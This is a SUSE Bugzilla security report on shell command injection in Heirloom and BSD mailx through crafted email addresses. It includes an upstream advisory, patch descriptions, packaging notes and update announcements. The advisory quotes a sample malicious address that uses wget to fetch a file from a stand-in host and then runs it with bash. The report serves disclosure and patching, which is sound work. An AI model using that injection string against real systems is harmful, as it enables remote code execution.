Bugzilla – Bug 909208
VUL-0: CVE-2004-2771, CVE-2014-7844: mailx: shell command injection via crafted email addresses
Last modified: 2021-01-19 12:48:58 UTC
CDR: 2014-12-16, 1200 UTC It turns out that various versions of mailx have shell command injection via crafted email addresses. These issues are different from the POSIX-mandated shell escape in email bodies (“~!”), which most implementations switch off when the input is not a terminal. There are two main branches of mailx these days, Heirloom mailx and BSD mailx. Heirloom mailx is defunct upstream and has been superseded by nail (according to the nail author, so take that with a grain of salt). I have not been able to contact the Heirloom mailx upstream. (In practice, the successor for anything but script use is probably mutt, at least in GNU/Linux land.) For BSD mailx, OpenBSD seems the canonical source these days. I discussed these issues with Todd Miller (Cc:ed), who kindly provided patches for their version. *** Heirloom mailx *** For Heirloom mailx, the numbered patches address the following issues: 0001. Do not recognize paths, mail folders, and pipes in mail addresses by default. That avoids a direct command injection with syntactically valid email addresses such as: |wget${IFS}ftp.example.com/a&&bash${IFS}a&&@example.com Such addresses can be specified both on the command line, the mail headers (with “-t”) or in address lines copied over from previous mail while replying. This was assigned CVE-2014-7844 for some versions of BSD mailx. It is documented behavior for Heirloom mailx, and was mentioned in an old technical report about BSD mailx (which does not usually make its way into operating system installations). The patch switches off this processing and updates the documentation. 0002. When invoking sendmail, prevent option processing for email address arguments. This prevents changing e.g. the Postfix configuration file in unexpected ways. This behavior was documented for BSD mailx (sort of), but not for Heirloom mailx. We did not assign a CVE to this because it is more of a missing feature, and code invoking mailx needs adjustment in the caller as well. 0003. Make wordexp support mandatory. (No functional change.) 0004. Prevent command execution in the expand function, which is IMHO unexpected. (Not really required with patch 1, and there is still information disclosure/DoS potential if this expansion occurs.) This is a historic vulnerability already fixed in the Debian package, retroactively assigned CVE-2004-2771: <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=278748> (The Heirloom patch is slightly different because of the existing use of wordexp.) *** BSD mailx *** The unnumbered patches are for BSD mailx. Their order is: remove_T, minus_f, mail_glob, expandaddr, nosendmail. remove_T and minus_f have already been committed. The remaining three roughly correspond to my patches 0003+0004, 0001, and 0002. The previous BSD mailx code seems to have an implicit dependency of a non-option-reordering getopt. (BSD getopt does not recognize options after non-option arguments, GNU getopt does.) I think the minus_f patch only improves matters in this regard. *** Coordinated release date *** Coordinated release date is 2014-12-16, 1200 UTC. *** Fixing applications *** Applications calling mailx with untrusted addresses which can start with “-” still need updating to use “--”. This is sadly not compatible with older mailx versions lacking the equivalent of patch 0002. However, directly calling “/usr/sbin/sendmail -i -t” with a self-constructed email header will work on almost all systems. Option processing is risky for two reasons: Some of the options are plainly harmful (e.g., “-Sexpandaddr=@example.com”). Others can be used to mask email addresses, which means that mailx enters read mode, where you can run shells using the “!” escape (which is especially problematic if mailx is used to send mail with partially attacker-controlled content). For Heirloom mailx, I tried to work around this, but both Sebastian Krahmer and Todd Miller helpfully pointed out that I missed some options, and that the whole approach is unlikely to work, ever. I already ported one applications over to sendmail, and it wasn't too hard, so I think this is the proper way forward. *** Further communications *** Please keep Todd and me Cc: on subsequent messages because we are not subscribed to the distros list. -- Florian Weimer / Red Hat Product Security
Created attachment 616516 [details] bugfix tar archive
bugbot adjusting priority
I've fixed all maintained packages[1], as this currently embargoed, I'd like to know how to handle the openSUSE packages? [1] mailx/Updates> foreach d (openSUSE_1* SLE-1*) foreach? pushd $d foreach? osc st foreach? popd foreach? end /usr/src/werner/mailx/Updates/openSUSE_12.3 /usr/src/werner/mailx/Updates A 0001-outof-Introduce-expandaddr-flag.patch A 0002-unpack-Disable-option-processing-for-email-addresses.patch A 0003-fio.c-Unconditionally-require-wordexp-support.patch A 0004-globname-Invoke-wordexp-with-WRDE_NOCMD-CVE-2004-277.patch M mailx-12.5.dif M mailx.changes M mailx.spec M nail-11.25-path.dif /usr/src/werner/mailx/Updates /usr/src/werner/mailx/Updates/openSUSE_13.1 /usr/src/werner/mailx/Updates A 0001-outof-Introduce-expandaddr-flag.patch A 0002-unpack-Disable-option-processing-for-email-addresses.patch A 0003-fio.c-Unconditionally-require-wordexp-support.patch A 0004-globname-Invoke-wordexp-with-WRDE_NOCMD-CVE-2004-277.patch M mailx-12.5.dif M mailx.changes M mailx.spec M nail-11.25-path.dif /usr/src/werner/mailx/Updates /usr/src/werner/mailx/Updates/openSUSE_13.2 /usr/src/werner/mailx/Updates A 0001-outof-Introduce-expandaddr-flag.patch A 0002-unpack-Disable-option-processing-for-email-addresses.patch A 0003-fio.c-Unconditionally-require-wordexp-support.patch A 0004-globname-Invoke-wordexp-with-WRDE_NOCMD-CVE-2004-277.patch M mailx-12.5.dif M mailx.changes M mailx.spec M nail-11.25-path.dif /usr/src/werner/mailx/Updates /usr/src/werner/mailx/Updates/SLE-10-SP2 /usr/src/werner/mailx/Updates A 0001-outof-Introduce-expandaddr-flag.patch A 0002-unpack-Disable-option-processing-for-email-addresses.patch A 0003-fio.c-Unconditionally-require-wordexp-support.patch A 0004-globname-Invoke-wordexp-with-WRDE_NOCMD-CVE-2004-277.patch M mailx.changes M mailx.spec M nail-11.25-path.dif /usr/src/werner/mailx/Updates /usr/src/werner/mailx/Updates/SLE-11 /usr/src/werner/mailx/Updates A 0001-outof-Introduce-expandaddr-flag.patch A 0002-unpack-Disable-option-processing-for-email-addresses.patch A 0003-fio.c-Unconditionally-require-wordexp-support.patch A 0004-globname-Invoke-wordexp-with-WRDE_NOCMD-CVE-2004-277.patch M mailx.changes M mailx.spec M nail-11.25-path.dif /usr/src/werner/mailx/Updates /usr/src/werner/mailx/Updates/SLE-12 /usr/src/werner/mailx/Updates A 0001-outof-Introduce-expandaddr-flag.patch A 0002-unpack-Disable-option-processing-for-email-addresses.patch A 0003-fio.c-Unconditionally-require-wordexp-support.patch A 0004-globname-Invoke-wordexp-with-WRDE_NOCMD-CVE-2004-277.patch M mailx-12.5.dif M mailx.changes M mailx.spec M nail-11.25-path.dif /usr/src/werner/mailx/Updates
> I've fixed all maintained packages[1], as this currently embargoed, I'd like > to know how to handle the openSUSE packages? You can prepare the submissions locally and submit to openSUSE after this issue went public. The security team will update this bug report and remove the embargo as soon as this got disclosed.
An update workflow for this issue was started. This issue was rated as moderate. Please submit fixed packages until 2014-12-25. When done, reassign the bug to security-team@suse.de. https://swamp.suse.de/webswamp/wf/60009
public
(In reply to Johannes Segitz from comment #10) Submitted to openSUSE 12.3, 13.1, 13.2, and Factory
This is an autogenerated message for OBS integration: This bug (909208) was mentioned in https://build.opensuse.org/request/show/265558 12.3 / mailx https://build.opensuse.org/request/show/265559 13.1 / mailx https://build.opensuse.org/request/show/265560 13.2 / mailx https://build.opensuse.org/request/show/265561 Factory / mailx
SUSE-SU-2014:1658-1: An update that fixes two vulnerabilities is now available. Category: security (moderate) Bug References: 909208 CVE References: CVE-2004-2771,CVE-2014-7844 Sources used: SUSE Linux Enterprise Server 12 (src): mailx-12.5-22.1 SUSE Linux Enterprise Desktop 12 (src): mailx-12.5-22.1
SUSE-SU-2014:1696-1: An update that fixes two vulnerabilities is now available. Category: security (moderate) Bug References: 909208 CVE References: CVE-2004-2771,CVE-2014-7844 Sources used: SUSE Linux Enterprise Server 11 SP3 for VMware (src): mailx-12.5-1.7.1 SUSE Linux Enterprise Server 11 SP3 (src): mailx-12.5-1.7.1 SUSE Linux Enterprise Desktop 11 SP3 (src): mailx-12.5-1.7.1
openSUSE-SU-2014:1713-1: An update that fixes two vulnerabilities is now available. Category: security (moderate) Bug References: 909208 CVE References: CVE-2004-2771,CVE-2014-7844 Sources used: openSUSE 13.2 (src): mailx-12.5-20.4.1 openSUSE 13.1 (src): mailx-12.5-14.4.1 openSUSE 12.3 (src): mailx-12.5-9.4.1
was released